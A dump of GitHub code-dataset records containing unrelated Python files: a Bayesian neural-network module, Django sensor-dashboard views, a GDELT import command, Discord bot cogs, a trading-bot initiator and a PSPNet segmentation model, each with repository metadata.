CREATE THE MODEL ###############\r\nclass ApproximateInvariance(nn.Module):\r\n    def __init__(self, input_dim, hidden_dim, output_dim, sample_size, prior=GaussianLayer):\r\n        super(ApproximateInvariance, self).__init__()\r\n        self.prior = prior\r\n        self.sample_size = sample_size\r\n        self.input_dim = input_dim\r\n        self.output_dim = output_dim\r\n        self.weight_1 = prior((hidden_dim, input_dim), standard=True)\r\n        self.bias_1 = prior((hidden_dim,), standard=True)\r\n        self.weight_2 = prior((output_dim, hidden_dim), standard=True)\r\n        self.bias_2 = prior((output_dim,), standard=True)\r\n\r\n    def batch_forward(self, x, x_aug):\r\n        # We remove the num_sample dimension if it is equal to one.\r\n        w1 = self.weight_1().squeeze(0)\r\n        b1 = self.bias_1()\r\n        w2 = self.weight_2().squeeze(0)\r\n        b2 = self.bias_2()\r\n\r\n        x = F.linear(x, w1, b1)\r\n        x = F.relu(x)\r\n        x = F.linear(x, w2, b2)\r\n        x = F.softmax(x, dim=-1) + 1e-8\r\n\r\n        x_aug = F.linear(x_aug, w1, b1)\r\n        x_aug = F.relu(x_aug)\r\n        x_aug = F.linear(x_aug, w2, b2)\r\n        x_aug = F.softmax(x_aug, dim=-1) + 1e-8\r\n        return x, x_aug\r\n\r\n    def forward(self, x, x_aug):\r\n        \"\"\"\r\n        We need to compute the output of the neural network for the input x\r\n        and the augmented input x_aug with the same weights. And we need\r\n        to sample a new set of weights for each augmentation, hence the loop.\r\n        Input:\r\n            x: torch Tensor. shape = (batch_size, num_sample, input_dim)\r\n            x_aug: has the same attributes as x, but here for each num_sample there is a different augmentation,\r\n            while for x the tensor is repeated to leverage broadcasting.\r\n        \"\"\"\r\n        if self.sample_size > 1:\r\n            batch_size, num_samples, _ = x.shape\r\n            results = torch.zeros(batch_size, num_samples, self.output_dim)\r\n            results_aug = torch.zeros_like(results)\r\n            for i in range(num_samples):\r\n                results[:,i], results_aug[:,i] = self.batch_forward(x[:,i], x_aug[:,i])\r\n        else:\r\n            results, results_aug = self.batch_forward(x, x_aug)\r\n        return results, results_aug\r\n\r\n    def entropy(self):\r\n        \"\"\"\r\n        Each weight computes its own entropy\r\n        \"\"\"\r\n        entropy_w1 = self.weight_1.entropy()\r\n        entropy_b1 = self.bias_1.entropy()\r\n        entropy_w2 = self.weight_2.entropy()\r\n        entropy_b2 = self.bias_2.entropy()\r\n        return entropy_w1 + entropy_b1 + entropy_w2 + entropy_b2\r\n\r\ndef kl_div_output(pred1, pred2, sample_size):\r\n    \"\"\"\r\n    This function computes the KL divergence between the output of\r\n    the standard neural network and the neural network with augmented data\r\n    Input:\r\n        pred1. Float tensor. K-class softmax prediction of network 1\r\n        pred2. Float tensor. K-class softmax prediction of network 2\r\n    Output:\r\n        kl_div. Float. 
The KL divergence between the two\r\n \"\"\"\r\n if sample_size > 1:\r\n batch_size, num_sample, output_dim = pred1.shape\r\n log_ratio = torch.log(pred1/pred2)\r\n kl_div = torch.mean(pred1 * log_ratio, axis=[0,1]) # Average over num_sample and batches\r\n return kl_div.sum()\r\n else:\r\n log_ratio = torch.log(pred1/pred2)\r\n kl_div = torch.mean(pred1 * log_ratio, axis=0) # Average over batches\r\n return kl_div.sum()\r\n\r\n\r\n\r\n# @title Bayes by Backprogagation class\r\nclass BayesbyBackprop(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, output_dim, prior):\r\n super(BayesbyBackprop, self).__init__()\r\n self.prior = prior\r\n self.weight_1 = GaussianLayer((hidden_dim, input_dim))\r\n self.bias_1 = GaussianLayer((hidden_dim,))\r\n self.weight_2 = GaussianLayer((output_dim, hidden_dim))\r\n self.bias_2 = GaussianLayer((output_dim,))\r\n\r\n def forward(self, x):\r\n # We remove the num_sample dimension if it is equal to one.\r\n w1 = self.weight_1().squeeze(0)\r\n b1 = self.bias_1()\r\n w2 = self.weight_2().squeeze(0)\r\n b2 = self.bias_2()\r\n\r\n# import pdb; pdb.set_trace()\r\n\r\n x = F.linear(x, w1, b1)\r\n x = F.selu(x)\r\n x = F.linear(x, w2, b2)\r\n x = F.selu(x)\r\n\r\n return x\r\n\r\n def sample(self, num_samples=5):\r\n w1_samples = self.weight_1(num_samples=num_samples).view((num_samples, -1))\r\n b1_samples = self.bias_1(num_samples=num_samples).view((num_samples, -1))\r\n w2_samples = self.weight_2(num_samples=num_samples).view((num_samples, -1))\r\n b2_samples = self.bias_2(num_samples=num_samples).view((num_samples, -1))\r\n\r\n gen_weights = torch.cat([w1_samples, b1_samples, w2_samples, b2_samples], 1)\r\n\r\n return gen_weights\r\n\r\n def __kl(self, mu_1, log_var_1, mu_2, log_var_2):\r\n \"\"\"\r\n KL divergence between two univariate Gaussian\r\n \"\"\"\r\n var_1 = log_var_1.exp()\r\n var_2 = log_var_2.exp()\r\n kl = torch.mean(log_var_2-log_var_1 + (var_1.pow(2)-var_2.pow(2) + (mu_1-mu_2).pow(2))/(2 * var_2.pow(2)))\r\n return kl\r\n\r\n def KL_loss(self):\r\n kl_w1 = self.__kl(self.weight_1.mu, self.weight_1.log_var, self.prior.weight_1.mu, self.prior.weight_1.log_var)\r\n kl_b1 = self.__kl(self.bias_1.mu, self.bias_1.log_var, self.prior.bias_1.mu, self.prior.bias_1.log_var)\r\n kl_w2 = self.__kl(self.weight_2.mu, self.weight_2.log_var, self.prior.weight_2.mu, self.prior.weight_2.log_var)\r\n kl_b2 = self.__kl(self.bias_2.mu, self.bias_2.log_var, self.prior.bias_2.mu, self.prior.bias_2.log_var)\r\n return (kl_w1 + kl_w2 + kl_b1 + kl_b2)/4\r\n","repo_name":"jmamath/learning-approximate-invariance-requires-far-fewer-data","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":10855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19807070637","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .models import Sensor, Werte\nfrom web.forms.TempsFilterForm import TempsFilterForm\n# from web.forms.HumidsFilterForm import HumidsFilterForm\nfrom web.forms.SensorCreateEditModelForm import SensorCreateEditModelForm\nfrom django.db.models import Max, Min\nfrom django.contrib.auth import authenticate\nfrom datetime import datetime, timedelta\n\ndef login(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request, username=username, password=password)\n if user is None:\n return render(request, \"web/login.html\")\n else:\n return 
redirect(index)\n    else:\n        return render(request, 'web/login.html')\n\ndef index(request):\n    # return HttpResponse(\"Hello, world. You're at the web app.\")\n    return render(request, 'web/index.html')\n\ndef display_sensors(request):\n    queryset = Sensor.objects.all()\n    return render(request, \"web/sensors.html\", {\"sensorlist\": list(queryset)})\n\ndef create_sensor(request):\n    \n    if request.method == \"POST\":\n        form = SensorCreateEditModelForm(request.POST)\n        if form.is_valid():\n            form.save()\n            return redirect(\"/web/sensors\")\n    else: \n        form = SensorCreateEditModelForm()\n    return render(request, \"web/sensor_edit.html\", {\"form\": form})\n    \ndef sensordetail(request, sensor_id):\n    queryset = Sensor.objects.get(pk=sensor_id)\n    print(queryset.sen_raum)\n    return render(request, \"web/sensorDetails.html\", {\"data\": {\"sensorId\": sensor_id, \"sensor\": queryset}})\n\n\ndef edit_sensor_details(request, sensor_id):\n    sensor = Sensor.objects.get(pk=sensor_id)\n\n    if request.method == \"POST\":\n        print(\"POST\")\n        form = SensorCreateEditModelForm(request.POST, instance=sensor)\n        if form.is_valid():\n            form.save()\n            return redirect(\"/web/sensors/\")\n    else:\n        print(\"GET\")\n        print(sensor_id)\n        form = SensorCreateEditModelForm(instance=sensor)\n        print(sensor)\n    return render(request, \"web/sensor_edit.html\", {\"form\": form})\n\ndef display_temps(request):\n    print(\"display_temps\")\n    if request.method == \"POST\":\n        form = TempsFilterForm(request.POST)\n        print(\"display_temps\")\n        print(form)\n\n        if form.is_valid():\n            print(form.cleaned_data)\n            lowerVal = form.cleaned_data[\"lowerVal\"]\n            if lowerVal is None:\n                lowerVal = Werte.objects.aggregate(Min('temperatur'))[\"temperatur__min\"]\n            print(lowerVal)\n            \n            upperVal = form.cleaned_data[\"upperVal\"]\n            if upperVal is None:\n                upperVal = Werte.objects.aggregate(Max('temperatur'))[\"temperatur__max\"]\n            print(upperVal)\n            \n            # if upperVal is None:\n            #     upperVal = Werte.ob\n            vonDate = form.cleaned_data[\"vonDate\"]\n            bisDate = form.cleaned_data[\"bisDate\"]\n            print(f\"{lowerVal}, {upperVal}, {vonDate}, {bisDate}\")\n            # queryset = Werte.objects.filter(temperatur__lte = form.cleaned_data[\"upperVal\"])\n            # queryset = Werte.objects.filter(temperatur__range = (lowerVal, upperVal))\n            queryset = Werte.objects.filter(datum__gte = vonDate, datum__lte = (bisDate + timedelta(days=1)),\n                                            temperatur__lte = upperVal, temperatur__gte = lowerVal)\n            \n            \n            return render(request, \"web/temps.html\", {\"page_name\": \"Temperatur\", \"tempslist\": list(queryset), \"form\": form})\n        else:\n            return HttpResponse(f\"Error! 
{form.errors}\")\n else:\n print(\"GET\")\n form = TempsFilterForm()\n form.lowerVal = 4\n queryset = Werte.objects.all()\n tempListe = list(queryset)\n #print(dict(queryset))\n print (tempListe)\n return render(request, \"web/temps.html\", {\"page_name\": \"Temperatur\", \"form\": form, \"tempslist\": tempListe})\n\ndef show_press(request):\n if request.method == \"POST\":\n form = TempsFilterForm(request.POST) \n\n if form.is_valid():\n lowerVal = form.cleaned_data[\"lowerVal\"]\n if lowerVal is None:\n lowerVal = Werte.objects.aggregate(Min('luftdruck'))[\"luftdruck__min\"]\n\n upperVal = form.cleaned_data[\"upperVal\"]\n if upperVal is None:\n upperVal = Werte.objects.aggregate(Max('luftdruck'))[\"luftdruck__max\"]\n \n vonDate = form.cleaned_data[\"vonDate\"]\n bisDate = form.cleaned_data[\"bisDate\"]\n\n queryset = Werte.objects.filter(datum__gte=vonDate, datum__lte=(bisDate + timedelta(days=1)),\n luftdruck__lte=upperVal, luftdruck__gte=lowerVal)\n \n return render(request, \"web/pressure.html\", {\"page_name\": \"Luftdruck\", \"pressList\": list(queryset), \"form\": form})\n \n else:\n form = TempsFilterForm()\n queryset = Werte.objects.all()\n pressList = list(queryset)\n return render(request, \"web/pressure.html\", {\"page_name\": \"Luftdruck\", \"form\": form, \"pressList\": pressList})\n \ndef show_humidity(request):\n if request.method == \"POST\":\n pass\n else:\n form = TempsFilterForm()\n queryset = Werte.objects.all()\n humidityList = list(queryset)\n return render(request, \"web/humidity.html\", {\"page_name\": \"Luftfeuchtigkeit\", \"form\": form, \"humidityList\":humidityList })","repo_name":"ronBruetsch01/SmarthomeWeb","sub_path":"smarthomeweb_proj/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2805194674","text":"from customer360.utilities.spark_util import get_spark_session, get_spark_empty_df\nfrom customer360.utilities.re_usable_functions import check_empty_dfs, data_non_availability_and_missing_check\nfrom kedro.context.context import load_context\nfrom pathlib import Path\nimport os, logging\nfrom pyspark.sql import DataFrame, functions as f\n\nconf = os.getenv(\"CONF\", None)\n\n\ndef union_weekly_cust_profile(\n cust_prof_daily_df: DataFrame,\n exception_partition=None\n\n):\n ################################# Start Implementing Data availability checks #############################\n if check_empty_dfs([cust_prof_daily_df]):\n return get_spark_empty_df()\n\n cust_prof_daily_df = data_non_availability_and_missing_check(df=cust_prof_daily_df, grouping=\"weekly\",\n par_col=\"event_partition_date\",\n missing_data_check_flg='Y',\n target_table_name=\"l2_customer_profile_union_weekly_feature\",\n exception_partitions=exception_partition)\n\n if check_empty_dfs([cust_prof_daily_df]):\n return get_spark_empty_df()\n\n ################################# End Implementing Data availability checks ###############################\n\n cust_prof_daily_df = cust_prof_daily_df.drop(\"start_of_month\")\n\n sql_stmt = \"\"\"\n with ranked_cust_profile as (\n select \n *,\n row_number() over (partition by subscription_identifier, start_of_week\n order by event_partition_date desc) as _rnk\n from cust_prof_daily_df\n )\n select *\n from ranked_cust_profile\n where _rnk = 1\n \"\"\"\n\n def divide_chunks(l, n):\n # looping till length l\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n CNTX = load_context(Path.cwd(), env=conf)\n 
dates_list = cust_prof_daily_df.select('start_of_week').distinct().collect()\n    mvv_array = [row[0] for row in dates_list if row[0] != \"SAMPLING\"]\n    mvv_array = sorted(mvv_array)\n    logging.info(\"Dates to run for {0}\".format(str(mvv_array)))\n\n    mvv_new = list(divide_chunks(mvv_array, 10))\n    add_list = mvv_new\n\n    first_item = add_list[-1]\n\n    add_list.remove(first_item)\n    spark = get_spark_session()\n    for curr_item in add_list:\n        logging.info(\"running for dates {0}\".format(str(curr_item)))\n        small_df = cust_prof_daily_df.filter(f.col(\"start_of_week\").isin(*[curr_item]))\n        small_df.createOrReplaceTempView(\"cust_prof_daily_df\")\n        small_df = spark.sql(sql_stmt).drop(\"_rnk\", \"event_partition_date\")\n        CNTX.catalog.save(\"l2_customer_profile_union_weekly_feature\", small_df)\n\n    logging.info(\"Final date to run for {0}\".format(str(first_item)))\n    return_df = cust_prof_daily_df.filter(f.col(\"start_of_week\").isin(*[first_item]))\n    return_df.createOrReplaceTempView(\"cust_prof_daily_df\")\n    return_df = spark.sql(sql_stmt).drop(\"_rnk\", \"event_partition_date\")\n\n    return return_df\n\n","repo_name":"Namonsasip/c360_pr","sub_path":"src/customer360/pipelines/data_engineering/nodes/customer_profile_nodes/to_l2/to_l2_nodes.py","file_name":"to_l2_nodes.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"19847189293","text":"from enum import Enum\nfrom time import sleep\nfrom multiprocessing import Queue\nfrom arquants.cerebro import AQCerebro\nfrom arquants.definitions import aqhandler\nfrom arquants.stores.aq_store import AQStore\n\n\nclass MDSubsType(Enum):\n    AGGREGATED = 'aggregated'\n    DISAGGREGATED = 'disaggregated'\n    TOP = 'top'\n\n\nclass Symbol:\n\n    def __init__(self, market=None, symbol=None, md_type: MDSubsType = None):\n        self.market = market\n        self.symbol = symbol\n        self.md_type = md_type\n\n\nclass Initiator:\n\n    def __init__(self, symbols=None, strat_cls=None):\n        aqhandler.init_public_aq()\n        if not aqhandler.get_account():\n            raise Exception(\"No account\")\n\n        queue = Queue()\n        store = AQStore(queue)\n        broker = store.getbroker()\n\n        self.cerebro = AQCerebro(queue, quicknotify=True, stdstats=False)\n        self.cerebro.setbroker(broker)\n\n        for item in symbols:\n            market = item.market\n            symbol = item.symbol\n            md_type = item.md_type\n\n            data_cls = store.getdataclass(md_type.value)\n            data = data_cls(dataname=symbol, account=aqhandler.get_account(), routingkey='rk-rofx-income',\n                            market=market, price_size=1)\n\n            self.cerebro.adddata(data)\n\n        self.cerebro.addstrategy(strat_cls)\n\n        # Give it a few seconds to connect to the API and the websocket.\n        sleep(2)\n\n    def start(self):\n        sleep(2)\n        self.cerebro.run()\n","repo_name":"webclinic017/aq","sub_path":"site-packages/arquants/initiator.py","file_name":"initiator.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"37229842865","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport os\n\nimport src.connection as connection\nfrom src.mode_manager import ModeManager\nfrom src.greeting import Greeter\nimport src.config as cfg\n\n\nclass Base(commands.Cog):\n    def __init__(self, bot: commands.Bot):\n        self.bot = bot\n\n    @commands.command()\n    async def hello(self, ctx: commands.Context):\n        \"\"\"\n        Send \"Hello World!\"\n        \"\"\"\n        await ctx.channel.send('**Hello World!**')\n\n    @commands.command()\n    async def 
connect(self, ctx: commands.Context, number: str):\n        \"\"\"\n        Connect to the voice channel in the guild where this command was invoked\n        that has the requested number\n        \"\"\"\n\n        if not number.isdigit():\n            await ctx.channel.send('Invalid argument')  # 1\n            return\n\n        number = int(number)\n\n        if not (1 <= number <= len(ctx.guild.voice_channels)):\n            await ctx.channel.send('Invalid argument')  # 2\n            return\n\n        new_channel = ctx.guild.voice_channels[number - 1]\n        await connection.connect(self.bot, new_channel)\n\n    @commands.command()\n    async def disconnect(self, ctx: commands.Context):\n        \"\"\"\n        disconnect from any voice channel\n        \"\"\"\n        await ctx.guild.change_voice_state(channel=None,\n                                           self_mute=False,\n                                           self_deaf=False)\n\n    @commands.command()\n    async def voice_members_info(self, ctx: commands.Context):\n        \"\"\"\n        Send info about members in all voice channels\n        \"\"\"\n        for channel in ctx.guild.voice_channels:\n            await ctx.channel.send(channel)\n            for member in channel.members:\n                await ctx.channel.send(member)\n\n    @commands.command()\n    async def members_info(self, ctx: commands.Context):\n        \"\"\"\n        Send info about members\n        \"\"\"\n        members = ctx.guild.members\n        await ctx.channel.send(members)\n\n    @commands.command()\n    async def members_brief_info(self, ctx: commands.Context):\n        \"\"\"\n        Send brief info about members\n        \"\"\"\n        members = ctx.guild.members\n        result = ''\n        for i in range(len(members)):\n            result += 'name: ' + members[i].name + ', '\n            result += 'id: ' + str(members[i].id) + ', '\n            result += 'discriminator: ' + members[i].discriminator\n            result += '\\n'\n        await ctx.channel.send(result)\n\n\nclass Mode(commands.Cog):\n    def __init__(self, bot: commands.Bot, mm: ModeManager):\n        self.bot = bot\n        self.mm = mm\n\n    @commands.command()\n    async def get_mode(self, ctx):\n        \"\"\"Get current mode\"\"\"\n        await ctx.channel.send('mode = {0}'.format(self.mm.get_mode()))\n\n    @commands.command()\n    async def set_mode(self, ctx, new_mode):\n        \"\"\"\n        Set mode (0 - off; 1 - mode 1; 2 - mode 2)\n        \"\"\"\n        if new_mode not in ['0', '1', '2']:\n            await ctx.channel.send('Invalid argument')  # 2\n            return\n        new_mode = int(new_mode)\n        await self.mm.set_mode(self.bot, new_mode)\n        await ctx.channel.send('mode = {0}'.format(self.mm.get_mode()))  # 3\n\n    @commands.command()\n    async def set_voice_channel(self, ctx, number):\n        \"\"\"\n        Set voice channel for mode 2\n        \"\"\"\n\n        if not number.isdigit():\n            await ctx.channel.send('Invalid argument')\n            return\n\n        new_channel = self.mm.voice_channel_for_mode_2\n\n        if number.isdigit():\n            number = int(number)\n            if 1 <= number <= len(ctx.guild.voice_channels):\n                new_guild = ctx.guild\n                new_channel = ctx.guild.voice_channels[number - 1]\n\n                if not new_guild.me.permissions_in(new_channel).connect:\n                    await ctx.channel.send('No access to this channel')\n                    return\n\n            elif number == 0:\n                new_channel = None\n\n            else:\n                await ctx.channel.send('Invalid number')\n                return\n\n        await self.mm.set_voice_channel(self.bot, new_channel)\n\n        # send response\n        if self.mm.voice_channel_for_mode_2 is None:\n            await ctx.channel.send('Voice channel number has been reset')\n        else:\n            addition = 'Name: ' + self.mm.voice_channel_for_mode_2.name\n            await ctx.channel.send('Voice channel number: ' +\n                                   str(number) +\n                                   '\\n' + addition)\n\n\nclass Greet(commands.Cog):\n    def __init__(self, bot: commands.Bot, gr: Greeter):\n        self.bot = bot\n        self.gr = gr\n\n    @commands.command()\n    async def play_greet(self, ctx: commands.Context):\n        \"\"\"\n        if bot is connected play 
greeting message\n        \"\"\"\n        executable_path = cfg.executable_path\n        if connection.is_connected(self.bot):\n            voice_client = self.bot.voice_clients[0]\n            if os.name == 'nt':\n                voice_client.play(discord.FFmpegPCMAudio(executable=executable_path,\n                                                         source=self.gr.greet_path))\n            elif os.name == 'posix':\n                voice_client.play(discord.FFmpegPCMAudio(source=self.gr.greet_path))\n\n            while voice_client.is_playing():\n                await asyncio.sleep(1)\n\n    @commands.command()\n    async def get_greet(self, ctx: commands.Context):\n        \"\"\"\n        Get current greeting message\n        \"\"\"\n        await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n    @commands.command()\n    async def set_greet(self, ctx: commands.Context, new_greet: str):\n        \"\"\"\n        Set greeting message\n        \"\"\"\n        new_greet = ' '.join(new_greet.split('_'))\n        self.gr.set_greet(new_greet)\n        await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n    @commands.command()\n    async def set_default_greet(self, ctx: commands.Context):\n        \"\"\"\n        Set default greeting message\n        \"\"\"\n        self.gr.set_default_greet()\n        await ctx.channel.send('greet = {0}'.format(self.gr.get_greet()))\n\n    @commands.command()\n    async def set_name(self, ctx: commands.Context,\n                       name_and_disc: str,\n                       extra_name: str):\n        \"\"\"\n        Set special name (extra_name) for some user (name_and_disc)\n        \"\"\"\n        extra_name = ' '.join(extra_name.split('_'))\n        mes = self.gr.set_name(name_and_disc, extra_name, ctx.guild.members)\n        await ctx.channel.send(mes)\n\n    @commands.command()\n    async def get_name(self, ctx, name_and_disc):\n        \"\"\"\n        Get name (rewrite)\n        \"\"\"\n        await ctx.channel.send(self.gr.get_name(name_and_disc, ctx.guild.members))\n\n    @commands.command()\n    async def extra_names(self, ctx, arg):\n        \"\"\"\n        Include or exclude extra names (0 - off, 1 - on)\n        \"\"\"\n        if arg == '0':\n            self.gr.extra_names_off()\n            await ctx.channel.send('Extra names are now disabled')\n\n        elif arg == '1':\n            self.gr.extra_names_on()\n            await ctx.channel.send('Extra names are now enabled')\n\n        else:\n            await ctx.channel.send('Invalid argument')\n\n","repo_name":"SanchoPanso/greeting_discord_bot","sub_path":"src/cogs.py","file_name":"cogs.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"8993485842","text":"#greedy approach - not optimal\ndef PredictTheWinner(nums):\n    score1 = 0\n    score2 = 0\n    print(nums)\n    while len(nums)>1:\n        score1t = max(nums[0],nums[-1])\n        print(\"player1's turn takes\", score1t)\n        if nums[0]> nums[-1]:\n            nums = nums[1:]\n        else:\n            \n            nums = nums[:-1]\n        #print(nums)\n        score1 +=score1t\n\n        score2t = max(nums[0],nums[-1])\n        print(\"player2's turn takes\",score2t)\n        if nums[0]> nums[-1]:\n            nums = nums[1:]\n        else:\n            \n            nums = nums[:-1]\n        print(nums)\n        score2 +=score2t\n    if len(nums)==1:\n        score1+=nums[0]\n\n    \n    print(score1, score2)\n    return score2 dict:\n    try:\n        templateFile = open(\"response.json\", \"r\")\n    except:\n        print(\"Response template is kept in response.json file, please add them there!\")\n        raise\n    \n    responseTemplate = json.load(templateFile)\n    templateFile.close()\n    \n    for k, v in responseTemplate.items():\n        if k in dataMock:\n            responseTemplate.update({k:dataMock[k]})\n    \n    return responseTemplate\n","repo_name":"ZuyRzuuf/iot_web-server","sub_path":"createResponse.py","file_name":"createResponse.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"14722647753","text":"import datetime\nimport json\nimport gdelt\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.db.utils import DataError\nfrom django.utils import timezone\nfrom djdelt.models import GKGDocument, GKGMedia\n\n\nclass Command(BaseCommand):\n help = 'Get updates from GDELT'\n\n def add_arguments(self, parser):\n parser.add_argument('table', nargs=1, type=str, choices=('events', 'mentions', 'gkg') )\n parser.add_argument('dates', nargs='?', type=str)\n parser.add_argument(\n '--coverage',\n action='store_true',\n dest='coverage',\n help='Fetch full coverage in specified date range'\n )\n\n def handle(self, table, dates, *args, **options):\n table = table[0]\n if not dates:\n dates = timezone.now().date().isoformat()\n gd2 = gdelt.gdelt(version=2)\n coverage = options['coverage']\n results = gd2.Search(dates, table=table, output='json', coverage=coverage)\n data = json.loads(results)\n for item in data:\n doc = GKGDocument.objects.filter(gkg_record_id=item['GKGRECORDID']).first()\n if doc:\n print('Skipping existing: %s' % item['GKGRECORDID'])\n else:\n print(item['GKGRECORDID'])\n doc = GKGDocument()\n doc.gkg_record_id = item['GKGRECORDID']\n try:\n dt = datetime.datetime.strptime(str(item['DATE']), '%Y%m%d%H%M%S')\n except ValueError:\n dt = None\n doc.date = dt\n doc.source_collection = item['SourceCollectionIdentifier']\n doc.source_common_name = item['SourceCommonName'] or ''\n doc.document_identifier = item['DocumentIdentifier'] or ''\n doc.v1counts = item['Counts'] or ''\n doc.v2counts = item['V2Counts'] or ''\n doc.v1themes = item['Themes'] or ''\n doc.v2themes = item['V2Themes'] or ''\n doc.v1locations = item['Locations'] or ''\n doc.v2locations = item['V2Locations'] or ''\n doc.v1persons = item['Persons'] or ''\n doc.v2persons = item['V2Persons'] or ''\n doc.v1organizations = item['Organizations'] or ''\n doc.v2organizations = item['V2Organizations'] or ''\n doc.tone = item['V2Tone'] or ''\n doc.dates = item['Dates'] or ''\n doc.gcam = item['GCAM'] or ''\n img = item['SharingImage'] or ''\n doc.sharing_image = img[:1024]\n doc.quotations = item['Quotations'] or ''\n doc.all_names = item['AllNames'] or ''\n doc.amounts = item['Amounts'] or ''\n doc.translation_info = item['TranslationInfo'] or ''\n doc.extras_xml = item['Extras'] or ''\n try:\n doc.save()\n except DataError:\n print('Unable to save GKG Document: %s' % doc.gkg_record_id)\n continue\n for url in item['RelatedImages'].split(';') \\\n if item['RelatedImages'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='RELATED_IMAGE').save()\n for url in item['SocialImageEmbeds'].split(';') \\\n if item['SocialImageEmbeds'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='SOCIAL_IMAGE_EMBED').save()\n for url in item['SocialVideoEmbeds'].split(';') \\\n if item['SocialVideoEmbeds'] else []:\n if url.strip():\n GKGMedia(\n document=doc,\n url=url.strip()[:1024],\n media_type='SOCIAL_VIDEO_EMBED').save()\n","repo_name":"scott2b/django-gdelt","sub_path":"djdelt/management/commands/gdelt.py","file_name":"gdelt.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37194531271","text":"from torchvision.models import resnet50, resnet101\nfrom torchvision.models._utils import IntermediateLayerGetter\nimport torch\nimport torch.nn as nn\n\n\nbackbone = IntermediateLayerGetter(\n 
resnet101(pretrained=False, replace_stride_with_dilation=[False, True, True]),\n return_layers={'layer3': 'aux', 'layer4': 'stage4'}\n)\n\nx = torch.randn(1, 3, 224, 224).cpu()\nresult = backbone(x)\nfor k, v in result.items():\n print(k, v.shape)\n\n\n# Pyramid Pooling Module\nclass PPM(nn.ModuleList):\n def __init__(self, pool_sizes, in_channels, out_channels):\n super(PPM, self).__init__()\n self.pool_sizes = pool_sizes\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n for pool_size in pool_sizes: # 1*1,2*2,3*3,6*6\n self.append(\n nn.Sequential(\n nn.AdaptiveMaxPool2d(pool_size),\n nn.Conv2d(self.in_channels, self.out_channels, kernel_size=1),\n )\n )\n\n def forward(self, x):\n out_puts = []\n for ppm in self:\n # upsample each pooled feature map back to the size of the input feature map with bilinear interpolation\n ppm_out = nn.functional.interpolate(ppm(x), size=x.size()[-2:], mode='bilinear', align_corners=True)\n out_puts.append(ppm_out)\n return out_puts\n\n\n\n# PSP head - obtain the final prediction from the enhanced features\n# 1. integrate the features with a 3x3 convolution\n# 2. adjust the channels to Num_Classes with a 1x1 convolution\n# 3. upsample (resize) so the final output layer has the same height and width as the input image\nclass PSPHEAD(nn.Module):\n def __init__(self, in_channels, out_channels, pool_sizes=[1, 2, 3, 6], num_classes=3): # 1*1,2*2,3*3,6*6\n super(PSPHEAD, self).__init__()\n self.pool_sizes = pool_sizes\n self.num_classes = num_classes\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.psp_modules = PPM(self.pool_sizes, self.in_channels, self.out_channels)\n self.final = nn.Sequential(\n nn.Conv2d(self.in_channels + len(self.pool_sizes) * self.out_channels, self.out_channels, kernel_size=3,\n padding=1),\n nn.BatchNorm2d(self.out_channels),\n nn.ReLU(),\n )\n\n def forward(self, x):\n out = self.psp_modules(x)\n out.append(x)\n out = torch.cat(out, 1)\n out = self.final(out)\n return out\n\n\n# build an FCN segmentation head, used to compute the auxiliary loss\nclass Aux_Head(nn.Module):\n def __init__(self, in_channels=1024, num_classes=3):\n super(Aux_Head, self).__init__()\n self.num_classes = num_classes\n self.in_channels = in_channels\n\n self.decode_head = nn.Sequential(\n nn.Conv2d(self.in_channels, self.in_channels // 2, kernel_size=3, padding=1),\n nn.BatchNorm2d(self.in_channels // 2),\n nn.ReLU(),\n\n nn.Conv2d(self.in_channels // 2, self.in_channels // 4, kernel_size=3, padding=1),\n nn.BatchNorm2d(self.in_channels // 4),\n nn.ReLU(),\n\n nn.Conv2d(self.in_channels // 4, self.num_classes, kernel_size=3, padding=1),\n\n )\n\n def forward(self, x):\n return self.decode_head(x)\n\n\n\n# PSPNet outputs two parts: one used for the segmentation loss and one for the auxiliary classification loss; the two are combined as a weighted sum\nclass Pspnet(nn.Module):\n def __init__(self, num_classes, aux_loss=True):\n super(Pspnet, self).__init__()\n self.num_classes = num_classes\n self.backbone = IntermediateLayerGetter(\n resnet50(pretrained=False, replace_stride_with_dilation=[False, True, True]),\n return_layers={'layer3': \"aux\", 'layer4': 'stage4'}\n )\n self.aux_loss = aux_loss\n self.decoder = PSPHEAD(in_channels=2048, out_channels=512, pool_sizes=[1, 2, 3, 6],\n num_classes=self.num_classes)\n self.cls_seg = nn.Sequential(\n nn.Conv2d(512, self.num_classes, kernel_size=3, padding=1),\n )\n if self.aux_loss:\n self.aux_head = Aux_Head(in_channels=1024, num_classes=self.num_classes)\n\n def forward(self, x):\n _, _, h, w = x.size()\n feats = self.backbone(x)\n x = self.decoder(feats[\"stage4\"])\n x = self.cls_seg(x)\n x = nn.functional.interpolate(x, size=(h, w), mode='bilinear', align_corners=True)\n\n # if the auxiliary loss needs to be added\n if self.aux_loss:\n aux_output = self.aux_head(feats['aux'])\n 